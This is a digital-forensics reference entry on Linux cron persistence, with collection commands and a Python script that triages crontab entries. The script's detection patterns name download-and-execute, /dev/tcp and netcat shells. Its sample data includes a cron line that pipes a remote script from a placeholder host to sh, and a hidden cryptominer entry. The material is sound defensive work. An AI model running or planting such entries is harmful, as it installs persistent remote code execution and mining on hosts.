Cron Jobs

Linux, Persistence Mechanisms, Disk Image

Location

/etc/crontab, /etc/cron.d/*, /var/spool/cron/crontabs/<user>

Description

Scheduled task definitions across system-wide crontab, the cron.d drop-in directory, and per-user crontabs. Each entry specifies a schedule, user context, and command to execute.

Forensic Value

Cron is the most common Linux persistence mechanism. Attacker cron entries typically download and execute payloads from external URLs, restart reverse shells at intervals, or run cryptominers. Checking /var/spool/cron/crontabs/ for all users reveals per-user entries that do not appear in the system-wide crontab. File modification timestamps on cron files help establish when persistence was installed.
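A triage pass over collected crontab text, flagging the entry types described above. This is an added example, not part of the original artifact entry: the pattern set, function names, and sample entries are assumptions constructed for illustration. It handles the format difference between system crontabs (user field after the schedule) and per-user crontabs (no user field; the owner is the file name).

```python
import re

# Heuristic patterns for the behaviours named above (assumed, not exhaustive).
SUSPICIOUS = {
    "download-and-execute": re.compile(r"\b(curl|wget)\b.*\|\s*(ba|da|z)?sh\b"),
    "remote-fetch": re.compile(r"\b(curl|wget)\b.*https?://"),
    "network-shell": re.compile(r"/dev/tcp/|\b(nc|ncat)\b.*\s-e\b", re.I),
    "encoded-command": re.compile(r"base64\s+(-d|--decode)"),
    "temp-path": re.compile(r"(^|[\s;&|])(/tmp|/var/tmp|/dev/shm)/"),
}
ENV_LINE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*\s*=")  # e.g. PATH=..., MAILTO=...

def parse_crontab(text, system, owner=None):
    """Yield (user, schedule, command) for each job line.
    system=True: /etc/crontab and /etc/cron.d/* (user field after the schedule).
    system=False: /var/spool/cron/crontabs/<user>; owner is the file name."""
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or ENV_LINE.match(line):
            continue
        n_sched = 1 if line.startswith("@") else 5  # @reboot etc. vs five time fields
        parts = line.split(None, n_sched + (1 if system else 0))
        if len(parts) < n_sched + (2 if system else 1):
            continue  # malformed or truncated entry
        user = parts[n_sched] if system else owner
        yield user, " ".join(parts[:n_sched]), parts[-1]

def triage(text, system, owner=None):
    """Return job entries whose command matches at least one heuristic."""
    findings = []
    for user, schedule, command in parse_crontab(text, system, owner):
        tags = sorted(n for n, rx in SUSPICIOUS.items() if rx.search(command))
        if tags:
            findings.append({"user": user, "schedule": schedule,
                             "command": command, "tags": tags})
    return findings

# Constructed sample data (not from a real host).
SYSTEM_SAMPLE = """SHELL=/bin/sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
*/10 * * * * root curl -fsSL http://updates.example.invalid/i.sh | sh
"""
USER_SAMPLE = """# m h dom mon dow command
0 3 * * * /usr/bin/backup.sh
@reboot /dev/shm/.kworker -o pool.example.invalid:3333
"""

if __name__ == "__main__":
    for f in triage(SYSTEM_SAMPLE, True) + triage(USER_SAMPLE, False, "alice"):
        print(f["user"], f["schedule"], f["tags"], f["command"], sep=" | ")
```

A match is a lead for review, not a verdict; entries that match nothing still need to be read against the host's known baseline.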

Tools Required

cat, find, ls -la, crontab -l, aureport

Collection Commands

tar

tar czf /forensics/output/cron_all.tar.gz /etc/crontab /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ /var/spool/cron/

find

find /var/spool/cron/crontabs/ -type f -exec cat {} \; > /forensics/output/user_crontabs.txt

cat

cat /etc/crontab /etc/cron.d/* > /forensics/output/system_crontabs.txt

find

find /etc/cron.d /var/spool/cron -type f -newer /etc/os-release -ls > /forensics/output/recently_modified_cron.txt

Collection Constraints

  • Paths and log sources vary by distribution, init system, logging stack, and installed packages. Validate the active distro and service set before treating absence as meaningful.

MITRE ATT&CK Techniques

T1053.003, T1053, T1059.004